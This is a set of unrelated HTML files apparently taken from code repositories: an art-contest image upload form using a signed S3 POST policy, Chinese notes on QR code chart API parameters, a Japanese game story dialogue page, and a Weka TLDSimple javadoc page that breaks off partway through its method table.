<!-- Replace favicon.ico & apple-touch-icon.png in the root of your domain and delete these references -->
<link rel="shortcut icon" href="/favicon.ico">
<link rel="apple-touch-icon" href="/apple-touch-icon.png">
<link rel="stylesheet" href="css/normalize.css">
<script src="js/vendor/modernizr-2.8.0.min.js"></script>
<!-- Bootstrap resources-->
<link rel="stylesheet" href="//netdna.bootstrapcdn.com/bootstrap/3.1.1/css/bootstrap.min.css">
<link rel="stylesheet" href="//netdna.bootstrapcdn.com/bootstrap/3.1.1/css/bootstrap-theme.min.css">
<link href='http://fonts.googleapis.com/css?family=Lato:300,400,700,300italic' rel='stylesheet' type='text/css'>
<link rel="stylesheet" href="css/main.css">
</head>
<body>
<nav id="justified-nav" class="navbar navbar-inverse navbar-fixed-top" role="navigation">
<div class="container-fluid">
<!-- Brand and toggle get grouped for better mobile display -->
<div class="navbar-header">
<button type="button" class="navbar-toggle" data-toggle="collapse" data-target="#bs-example-navbar-collapse-1">
<span class="sr-only">Toggle navigation</span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
</button>
<a class="navbar-brand" href="index.html"><img src="img/justified-art-logo-white-trans.png" width="180em"></a>
</div>
<!-- Collect the nav links, forms, and other content for toggling -->
<div class="collapse navbar-collapse" id="bs-example-navbar-collapse-1">
<ul class="nav navbar-nav navbar-right">
<li><a class="scroll" href="index.html#about-anchor">About</a></li>
<li><a class="scroll" href="index.html#submit-anchor">Submit</a></li>
<li><a class="scroll" href="index.html#jury-anchor">Jury</a></li>
</ul>
</div><!-- /.navbar-collapse -->
</div><!-- /.container-fluid -->
</nav>
<!-- content Area -->
<div class="container">
<div id="form-container">
<h4>Artwork #3</h4>
<p>Submit an image of your third work of art here.</p>
<br/>
<div class="row">
<div class="guidelines col-md-4 col-md-push-8 ">
<div class="guidelines-title">Image Formatting Specifications</div>
<div class="guidelines-content">
<ul style="padding-left:0; list-style-type:none;">
<li>Image Size: At least 620px wide</li>
<li>File Size: Less than 2MB per image</li>
<li>File Type: JPEG or PNG</li>
</ul>
</div>
</div>
<div class="col-md-8 col-md-pull-4">
<div class="row">
<div class="col-md-6">First Name: <input type="text" name="firstName" id="firstName" value=""></div>
<div class="col-md-6">Last Name: <input type="text" name="lastName" id="lastName" value=""></div>
</div>
<br/>
<form onsubmit="return(submitImages());" id="ImageForm" action="http://justifiedart.com.s3.amazonaws.com/" method="post" enctype="multipart/form-data">
<input id="ImageName" type="hidden" name="key" value="uploads/${filename}" />
<input type="hidden" name="acl" value="public-read" />
<input type="hidden" name="content-type" value="image/jpeg" />
<input type="hidden" name="AWSAccessKeyId" value="AKIAJDKCZ5WM2D2SA7LA" />
<input type="hidden" name="policy" value="ewogICJleHBpcmF0aW9uIjogIjIwMTUtMDEtMDFUMTI6MDA6MDAuMDAwWiIsCiAgImNvbmRpdGlvbnMiOiBbCiAgICB7ImJ1Y2tldCI6ICJqdXN0aWZpZWRhcnQuY29tIiB9LAogICAgeyJhY2wiOiAicHVibGljLXJlYWQiIH0sCiAgICBbInN0YXJ0cy13aXRoIiwgIiRrZXkiLCAidXBsb2Fkcy8iXSwKICAgIFsic3RhcnRzLXdpdGgiLCAiJENvbnRlbnQtVHlwZSIsICJpbWFnZS8iXSwKICAgIFsiY29udGVudC1sZW5ndGgtcmFuZ2UiLCAwLCAyMDk3MTUyXQogIF0KfQo=" />
<input type="hidden" name="signature" value="LBkBk/GCeJ5uj0LlGrEpZLscvWI=" />
<div class="row">Image for Artwork #3: <input style="display:inline-block;" id="ImageFile" name="file" type="file" /></div>
<div class="row" style="padding-top:1em;">
<div class="visuallyhidden"><label class="ss-q-title">I would like to...</label>
<ul style="list-style-type:none;" class="ss-choices">
<li><label class="ss-choice-label"><input type="radio" value="submit" checked>Finish my submission</label></li>
</ul>
</div>
</div>
<input class="btn btn-success" name="submit" value="Upload" type="submit" />
</form>
<!--HTML5 DnD uploader-->
<!--<article class="form-group">
<div class="form-control" id="holder">
</div>
<p id="upload" class="hidden"><label>Drag & drop not supported, but you can still upload via this input field:<br><input name="file" type="file"></label></p>
<p id="filereader">File API & FileReader API not supported</p>
<p id="formdata">XHR2's FormData is not supported</p>
<p id="progress">XHR2's upload progress isn't supported</p>
<p>Upload progress: <progress id="uploadprogress" min="0" max="100" value="0">0</progress></p>
<label for="holder">Drag an image from your desktop on to the drop zone above to see the browser both render the preview, but also upload automatically to this server.</label>
</article>-->
</div>
</div>
</div>
</div>
<div class="empty-space"></div>
<!-- End content Area -->
<section id="footer" class="padding-60">
<div class="container">
<div class="row">
<div class="col-md-4 margin-btm20">
<div class="footer-column">
<br><br>
<h3>Newsletter</h3>
<p class="margin-btm20">Join the Justified Art! newsletter to be notified about the Call for Entries, events and important updates:</p>
<p><form target="_blank" class="form-inline" action="http://groups.google.com/group/justified-art-newsletter/boxsubscribe">
<div class="form-group">
<label for="email-signup">Email:</label>
<input class="form-control" id="email-signup" type="text" name="email">
<input class="btn btn-primary" type="submit" name="sub" value="Submit"></form></p>
</div>
</div>
<!--
footer columns end
-->
</div>
<div class="col-md-4 margin-btm20">
<div class="footer-column">
<br><br>
<h3>Resources</h3>
<p><a href="http://host.madison.com/news/local/city-life/justified-anger-rev-alex-gee-says-madison-is-failing-its/article_14f6126c-fc1c-55aa-a6a3-6c3d00a4424c.html">"Justified Anger" essay by Rev. Alex Gee</a>
<br><a href="http://www.madisonjustifiedanger.com">Justified Anger website</a>
<br><a href="http://host.madison.com/ct/topics/race-in-madison/#utm_source=host.madison.com&utm_campaign=hot-topics-2&utm_medium=direct">The Cap Times: Together Apart</a>
<br><a href="http://racetoequity.net/dev/wp-content/uploads/WCCF-R2E-Report.pdf">Race to Equity Report</a></p>
</div>
<!--footer columns end-->
</div>
<div class="col-md-4 margin-btm20">
<div class="footer-column">
<br><br>
<h3>Contact</h3>
<ul class="list-unstyled contact-list margin-btm20">
<li><a href="mailto:infor@justifiedart.com">info@justifiedart.com</a></li>
<li><a href="https://www.facebook.com/justifiedartmadison">facebook</a></li>
</ul>
</div>
<!--footer columns end -->
</div>
</div>
<!--row end--><br><br><br><br><br><br><br>
<div class="divied-40"></div>
<div class="row">
<div class="col-md-12 text-center margin-btm20">
<a href="index.html">
</a>
</div>
<div class="col-md-12 text-center">
<span><img src="img/justified-art-logo-white-trans.png" width="180em"><p style="font-style:normal;">© 2014</p></span>
<br>
</div>
</div>
</div>
<!--container-->
</section>
<!--footer default end-->
<script src="//ajax.googleapis.com/ajax/libs/jquery/1.11.1/jquery.min.js"></script>
<script>window.jQuery || document.write('<script src="js/vendor/jquery-1.11.1.min.js"><\/script>')</script>
<script src="//netdna.bootstrapcdn.com/bootstrap/3.1.1/js/bootstrap.min.js"></script>
<script src="js/plugins.js"></script>
<script src="js/main.js"></script>
</body>
</html> |
solutions/二维码生成器.html | chancedai/front-end-solutions | <!doctype html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>二维码生成器</title>
</head>
<body>
<ol>
<li>
http://chart.googleapis.com/chart?chl=URL:http://bq69.com/&chs=200x200&cht=qr&chld=|1&choe=UTF-8
</li>
<li>https://chart.googleapis.com/chart? 是二维码API的地址</li>
<li>cht=qr 表明类型为二维码</li>
<li>chs=220×220 生成的二维码图片的尺寸</li>
<li>choe=UTF-8 内容的编码,默认为UTF-8</li>
<li>
chld=L|2 纠错级别和空白边框宽度。纠错级别从低到高分别为LMQH,级别越高错误率越低二维码的行和列也越多(Google API同时会根据二维码内容长度自动选择合适的二维码行列数)(在<a href="https://developers.google.com/chart/infographics/docs/overview?csw=1" target="_blank">Google API文档</a>中有更详细的介绍)。边框宽度可以自行选择
</li>
<li>
chl=http://bq69.com/ 二维码的内容。根据Google API文档的介绍,最好不要超过114个字符(纠错级别为L时),因为目前的移动设备最多支持第四版二维码(33×33,144字符)
</li>
<li>
<img alt="goooooooogle 唉" src="http://chart.googleapis.com/chart?chl=URL:http://bq69.com/&chs=200x200&cht=qr&chld=|1&choe=UTF-8" alt="http://bq69.com/">
</li>
</ol>
<p>或使用</p>
<ol>
<li>http://qr.liantu.com/api.php?w=200&el=l&m=25&text=text;</li>
<li>https://chart.googleapis.com/chart?cht=qr&chs=200x200&choe=UTF-8&chld=L|4&chl=text;</li>
<li>http://api.kuaipai.cn/qr?chs=200x200&chl=text;</li>
</ol>
</body>
</html> |
BFJPStoryArchive/BFJPStoryArchive/grand_13_05.html | Blackrobe/blackrobe.github.io | <!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<link rel="stylesheet" type="text/css" href="style/style.css">
<link rel="stylesheet" type="text/css" media="only screen and (min-device-width: 360px)" href="style-compact.css">
<script>
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
})(window,document,'script','//www.google-analytics.com/analytics.js','ga');
ga('create', 'UA-74917613-1', 'auto');
ga('send', 'pageview');
</script>
</head>
<body>
<div class="dungeonBackgroundContainer">
<img class="dungeonFrame" src="../../BFStoryArchive/BFStoryArchive/dungeon_battle_collection/baseDungeonFrame.png" />
<img class="dungeonImage" src="../../BFStoryArchive/BFStoryArchive/dungeon_battle_collection/dungeon_battle_102900.jpg" />
</div>
<div class="dialogueContainer">
<div class="facePortrait">
<img class="facePortraitFrame" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/characterFrame.png" />
<img class="facePortraitImg" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/navi_chara14_5.png" />
</div>
<div class="speakerName"><a href="http://i.imgur.com/GbFQykt.png">ノア</a></div>
<div class="speakerMessage">クッ…こんな雑魚どもに かまっている暇などないのに……。</div>
</div>
<br>
<div class="dialogueContainer">
<div class="facePortrait">
<img class="facePortraitFrame" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/characterFrame.png" />
<img class="facePortraitImg" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/navi_chara14_0.png" />
</div>
<div class="speakerName">ノア</div>
<div class="speakerMessage">ん、どうした、Shou-chan?</div>
</div>
<br>
<div class="dialogueContainer">
<div class="facePortrait">
<img class="facePortraitFrame" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/characterFrame.png" />
<img class="facePortraitImg" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/navi_chara14_2.png" />
</div>
<div class="speakerName">ノア</div>
<div class="speakerMessage">落ち着けだと?</div>
</div>
<br>
<div class="dialogueContainer">
<div class="facePortrait">
<img class="facePortraitFrame" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/characterFrame.png" />
<img class="facePortraitImg" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/navi_chara14_2.png" />
</div>
<div class="speakerName">ノア</div>
<div class="speakerMessage">これが落ち着いていられるか!!</div>
</div>
<br>
<div class="dialogueContainer">
<div class="facePortrait">
<img class="facePortraitFrame" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/characterFrame.png" />
<img class="facePortraitImg" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/navi_chara14_2.png" />
</div>
<div class="speakerName">ノア</div>
<div class="speakerMessage">エリーゼが危ないんだぞ!!</div>
</div>
<br>
<div class="dialogueContainer">
<div class="facePortrait">
<img class="facePortraitFrame" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/characterFrame.png" />
<img class="facePortraitImg" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/navi_chara14_3.png" />
</div>
<div class="speakerName">ノア</div>
<div class="speakerMessage">俺は誓ったんだ……。</div>
</div>
<br>
<div class="dialogueContainer">
<div class="facePortrait">
<img class="facePortraitFrame" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/characterFrame.png" />
<img class="facePortraitImg" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/navi_chara14_3.png" />
</div>
<div class="speakerName">ノア</div>
<div class="speakerMessage">もう二度と あいつを傷付けさせやしないと!</div>
</div>
<br>
<div class="dialogueContainer">
<div class="facePortrait">
<img class="facePortraitFrame" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/characterFrame.png" />
<img class="facePortraitImg" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/navi_chara14_0.png" />
</div>
<div class="speakerName">ノア</div>
<div class="speakerMessage">それに貴様は知らないだろうが、</div>
</div>
<br>
<div class="dialogueContainer">
<div class="facePortrait">
<img class="facePortraitFrame" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/characterFrame.png" />
<img class="facePortraitImg" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/navi_chara14_0.png" />
</div>
<div class="speakerName">ノア</div>
<div class="speakerMessage">エリーゼは、 魔神のそばにいるだけでも危険なんだ!</div>
</div>
<br>
<div class="dialogueContainer">
<div class="facePortrait">
<img class="facePortraitFrame" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/characterFrame.png" />
<img class="facePortraitImg" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/navi_chara14_0.png" />
</div>
<div class="speakerName">ノア</div>
<div class="speakerMessage">あいつがまだ召喚師として戦っていた頃、</div>
</div>
<br>
<div class="dialogueContainer">
<div class="facePortrait">
<img class="facePortraitFrame" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/characterFrame.png" />
<img class="facePortraitImg" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/navi_chara14_0.png" />
</div>
<div class="speakerName">ノア</div>
<div class="speakerMessage">俺をかばって、 ある魔神から呪傷を受けた……。</div>
</div>
<br>
<div class="dialogueContainer">
<div class="facePortrait">
<img class="facePortraitFrame" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/characterFrame.png" />
<img class="facePortraitImg" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/navi_chara14_0.png" />
</div>
<div class="speakerName">ノア</div>
<div class="speakerMessage">傷自体は完治したが、呪いの方は エリーゼの身体の中にまだ残っている……。</div>
</div>
<br>
<div class="dialogueContainer">
<div class="facePortrait">
<img class="facePortraitFrame" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/characterFrame.png" />
<img class="facePortraitImg" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/navi_chara14_0.png" />
</div>
<div class="speakerName">ノア</div>
<div class="speakerMessage">力の強い魔神、魔獣の近くにいるだけで、 あいつの生命力は奪われていくんだ!</div>
</div>
<br>
<div class="dialogueContainer">
<div class="facePortrait">
<img class="facePortraitFrame" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/characterFrame.png" />
<img class="facePortraitImg" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/navi_chara14_5.png" />
</div>
<div class="speakerName">ノア</div>
<div class="speakerMessage">クソッ… こうしている間にも!</div>
</div>
<br>
<div class="dialogueContainer">
<div class="facePortrait">
<img class="facePortraitFrame" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/characterFrame.png" />
<img class="facePortraitImg" src="../../BFStoryArchive/BFStoryArchive/navi_chara_collection/navi_chara14_2.png" />
</div>
<div class="speakerName">ノア</div>
<div class="speakerMessage">先を急ぐぞ!!</div>
</div>
<br>
</body>
</html>
<!-- contact me at reddit /u/blackrobe199 -->
|
weka/doc/weka/classifiers/mi/TLDSimple.html | chrissalij/Wiki-Reputation-Predictor | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--NewPage-->
<HTML>
<HEAD>
<!-- Generated by javadoc (build 1.6.0_17) on Mon Jan 11 20:34:00 NZDT 2010 -->
<TITLE>
TLDSimple
</TITLE>
<META NAME="date" CONTENT="2010-01-11">
<LINK REL ="stylesheet" TYPE="text/css" HREF="../../../stylesheet.css" TITLE="Style">
<SCRIPT type="text/javascript">
function windowTitle()
{
if (location.href.indexOf('is-external=true') == -1) {
parent.document.title="TLDSimple";
}
}
</SCRIPT>
<NOSCRIPT>
</NOSCRIPT>
</HEAD>
<BODY BGCOLOR="white" onload="windowTitle();">
<HR>
<!-- ========= START OF TOP NAVBAR ======= -->
<A NAME="navbar_top"><!-- --></A>
<A HREF="#skip-navbar_top" title="Skip navigation links"></A>
<TABLE BORDER="0" WIDTH="100%" CELLPADDING="1" CELLSPACING="0" SUMMARY="">
<TR>
<TD COLSPAN=2 BGCOLOR="#EEEEFF" CLASS="NavBarCell1">
<A NAME="navbar_top_firstrow"><!-- --></A>
<TABLE BORDER="0" CELLPADDING="0" CELLSPACING="3" SUMMARY="">
<TR ALIGN="center" VALIGN="top">
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../overview-summary.html"><FONT CLASS="NavBarFont1"><B>Overview</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="package-summary.html"><FONT CLASS="NavBarFont1"><B>Package</B></FONT></A> </TD>
<TD BGCOLOR="#FFFFFF" CLASS="NavBarCell1Rev"> <FONT CLASS="NavBarFont1Rev"><B>Class</B></FONT> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="package-tree.html"><FONT CLASS="NavBarFont1"><B>Tree</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../deprecated-list.html"><FONT CLASS="NavBarFont1"><B>Deprecated</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../index-all.html"><FONT CLASS="NavBarFont1"><B>Index</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../help-doc.html"><FONT CLASS="NavBarFont1"><B>Help</B></FONT></A> </TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="http://www.cs.waikato.ac.nz/ml/weka/" target="_blank"><FONT CLASS="NavBarFont1"><B>Weka's home</B></FONT></A> </TD>
</TR>
</TABLE>
</TD>
<TD ALIGN="right" VALIGN="top" ROWSPAN=3><EM>
</EM>
</TD>
</TR>
<TR>
<TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2">
<A HREF="../../../weka/classifiers/mi/TLD.html" title="class in weka.classifiers.mi"><B>PREV CLASS</B></A>
NEXT CLASS</FONT></TD>
<TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2">
<A HREF="../../../index.html?weka/classifiers/mi/TLDSimple.html" target="_top"><B>FRAMES</B></A>
<A HREF="TLDSimple.html" target="_top"><B>NO FRAMES</B></A>
<SCRIPT type="text/javascript">
<!--
if(window==top) {
document.writeln('<A HREF="../../../allclasses-noframe.html"><B>All Classes</B></A>');
}
//-->
</SCRIPT>
<NOSCRIPT>
<A HREF="../../../allclasses-noframe.html"><B>All Classes</B></A>
</NOSCRIPT>
</FONT></TD>
</TR>
<TR>
<TD VALIGN="top" CLASS="NavBarCell3"><FONT SIZE="-2">
SUMMARY: NESTED | <A HREF="#field_summary">FIELD</A> | <A HREF="#constructor_summary">CONSTR</A> | <A HREF="#method_summary">METHOD</A></FONT></TD>
<TD VALIGN="top" CLASS="NavBarCell3"><FONT SIZE="-2">
DETAIL: <A HREF="#field_detail">FIELD</A> | <A HREF="#constructor_detail">CONSTR</A> | <A HREF="#method_detail">METHOD</A></FONT></TD>
</TR>
</TABLE>
<A NAME="skip-navbar_top"></A>
<!-- ========= END OF TOP NAVBAR ========= -->
<HR>
<!-- ======== START OF CLASS DATA ======== -->
<H2>
<FONT SIZE="-1">
weka.classifiers.mi</FONT>
<BR>
Class TLDSimple</H2>
<PRE>
java.lang.Object
<IMG SRC="../../../resources/inherit.gif" ALT="extended by "><A HREF="../../../weka/classifiers/Classifier.html" title="class in weka.classifiers">weka.classifiers.Classifier</A>
<IMG SRC="../../../resources/inherit.gif" ALT="extended by "><A HREF="../../../weka/classifiers/RandomizableClassifier.html" title="class in weka.classifiers">weka.classifiers.RandomizableClassifier</A>
<IMG SRC="../../../resources/inherit.gif" ALT="extended by "><B>weka.classifiers.mi.TLDSimple</B>
</PRE>
<DL>
<DT><B>All Implemented Interfaces:</B> <DD>java.io.Serializable, java.lang.Cloneable, <A HREF="../../../weka/core/CapabilitiesHandler.html" title="interface in weka.core">CapabilitiesHandler</A>, <A HREF="../../../weka/core/MultiInstanceCapabilitiesHandler.html" title="interface in weka.core">MultiInstanceCapabilitiesHandler</A>, <A HREF="../../../weka/core/OptionHandler.html" title="interface in weka.core">OptionHandler</A>, <A HREF="../../../weka/core/Randomizable.html" title="interface in weka.core">Randomizable</A>, <A HREF="../../../weka/core/RevisionHandler.html" title="interface in weka.core">RevisionHandler</A>, <A HREF="../../../weka/core/TechnicalInformationHandler.html" title="interface in weka.core">TechnicalInformationHandler</A></DD>
</DL>
<HR>
<DL>
<DT><PRE>public class <B>TLDSimple</B><DT>extends <A HREF="../../../weka/classifiers/RandomizableClassifier.html" title="class in weka.classifiers">RandomizableClassifier</A><DT>implements <A HREF="../../../weka/core/OptionHandler.html" title="interface in weka.core">OptionHandler</A>, <A HREF="../../../weka/core/MultiInstanceCapabilitiesHandler.html" title="interface in weka.core">MultiInstanceCapabilitiesHandler</A>, <A HREF="../../../weka/core/TechnicalInformationHandler.html" title="interface in weka.core">TechnicalInformationHandler</A></DL>
</PRE>
<P>
<!-- globalinfo-start -->
A simpler version of TLD, mu random but sigma^2 fixed and estimated via data.<br/>
<br/>
For more information see:<br/>
<br/>
Xin Xu (2003). Statistical learning in multiple instance problem. Hamilton, NZ.
<p/>
<!-- globalinfo-end -->
<!-- technical-bibtex-start -->
BibTeX:
<pre>
@mastersthesis{Xu2003,
address = {Hamilton, NZ},
author = {Xin Xu},
note = {0657.594},
school = {University of Waikato},
title = {Statistical learning in multiple instance problem},
year = {2003}
}
</pre>
<p/>
<!-- technical-bibtex-end -->
<!-- options-start -->
Valid options are: <p/>
<pre> -C
Set whether or not use empirical
log-odds cut-off instead of 0</pre>
<pre> -R <numOfRuns>
Set the number of multiple runs
needed for searching the MLE.</pre>
<pre> -S <num>
Random number seed.
(default 1)</pre>
<pre> -D
If set, classifier is run in debug mode and
may output additional info to the console</pre>
<!-- options-end -->
<P>
<P>
<DL>
<DT><B>Version:</B></DT>
<DD>$Revision: 5527 $</DD>
<DT><B>Author:</B></DT>
<DD>Eibe Frank (eibe@cs.waikato.ac.nz), Xin Xu (xx5@cs.waikato.ac.nz)</DD>
<DT><B>See Also:</B><DD><A HREF="../../../serialized-form.html#weka.classifiers.mi.TLDSimple">Serialized Form</A></DL>
<HR>
<P>
<!-- =========== FIELD SUMMARY =========== -->
<A NAME="field_summary"><!-- --></A>
<TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY="">
<TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor">
<TH ALIGN="left" COLSPAN="2"><FONT SIZE="+2">
<B>Field Summary</B></FONT></TH>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE>static double</CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../weka/classifiers/mi/TLDSimple.html#ZERO">ZERO</A></B></CODE>
<BR>
The very small number representing zero</TD>
</TR>
</TABLE>
<!-- ======== CONSTRUCTOR SUMMARY ======== -->
<A NAME="constructor_summary"><!-- --></A>
<TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY="">
<TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor">
<TH ALIGN="left" COLSPAN="2"><FONT SIZE="+2">
<B>Constructor Summary</B></FONT></TH>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD><CODE><B><A HREF="../../../weka/classifiers/mi/TLDSimple.html#TLDSimple()">TLDSimple</A></B>()</CODE>
<BR>
</TD>
</TR>
</TABLE>
<!-- ========== METHOD SUMMARY =========== -->
<A NAME="method_summary"><!-- --></A>
<TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY="">
<TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor">
<TH ALIGN="left" COLSPAN="2"><FONT SIZE="+2">
<B>Method Summary</B></FONT></TH>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> void</CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../weka/classifiers/mi/TLDSimple.html#buildClassifier(weka.core.Instances)">buildClassifier</A></B>(<A HREF="../../../weka/core/Instances.html" title="class in weka.core">Instances</A> exs)</CODE>
<BR>
Generates a classifier.</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> double</CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../weka/classifiers/mi/TLDSimple.html#classifyInstance(weka.core.Instance)">classifyInstance</A></B>(<A HREF="../../../weka/core/Instance.html" title="class in weka.core">Instance</A> ex)</CODE>
<BR>
Classifies the given test instance.</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> double[]</CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../weka/classifiers/mi/TLDSimple.html#distributionForInstance(weka.core.Instance)">distributionForInstance</A></B>(<A HREF="../../../weka/core/Instance.html" title="class in weka.core">Instance</A> ex)</CODE>
<BR>
Computes the distribution for a given exemplar</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> <A HREF="../../../weka/core/Capabilities.html" title="class in weka.core">Capabilities</A></CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../weka/classifiers/mi/TLDSimple.html#getCapabilities()">getCapabilities</A></B>()</CODE>
<BR>
Returns default capabilities of the classifier.</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> <A HREF="../../../weka/core/Capabilities.html" title="class in weka.core">Capabilities</A></CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../weka/classifiers/mi/TLDSimple.html#getMultiInstanceCapabilities()">getMultiInstanceCapabilities</A></B>()</CODE>
<BR>
Returns the capabilities of this multi-instance classifier for the
relational data.</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> int</CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../weka/classifiers/mi/TLDSimple.html#getNumRuns()">getNumRuns</A></B>()</CODE>
<BR>
Returns the number of runs to perform.</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> java.lang.String[]</CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../weka/classifiers/mi/TLDSimple.html#getOptions()">getOptions</A></B>()</CODE>
<BR>
Gets the current settings of the Classifier.</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> java.lang.String</CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../weka/classifiers/mi/TLDSimple.html#getRevision()">getRevision</A></B>()</CODE>
<BR>
Returns the revision string.</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> <A HREF="../../../weka/core/TechnicalInformation.html" title="class in weka.core">TechnicalInformation</A></CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../weka/classifiers/mi/TLDSimple.html#getTechnicalInformation()">getTechnicalInformation</A></B>()</CODE>
<BR>
Returns an instance of a TechnicalInformation object, containing
detailed information about the technical background of this class,
e.g., paper reference or book this class is based on.</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> boolean</CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../weka/classifiers/mi/TLDSimple.html#getUsingCutOff()">getUsingCutOff</A></B>()</CODE>
<BR>
Returns whether an empirical cutoff is used</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> java.lang.String</CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../weka/classifiers/mi/TLDSimple.html#globalInfo()">globalInfo</A></B>()</CODE>
<BR>
Returns a string describing this filter</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> java.util.Enumeration</CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../weka/classifiers/mi/TLDSimple.html#listOptions()">listOptions</A></B>()</CODE>
<BR>
Returns an enumeration describing the available options</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE>static void</CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../weka/classifiers/mi/TLDSimple.html#main(java.lang.String[])">main</A></B>(java.lang.String[] args)</CODE>
<BR>
Main method for testing.</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
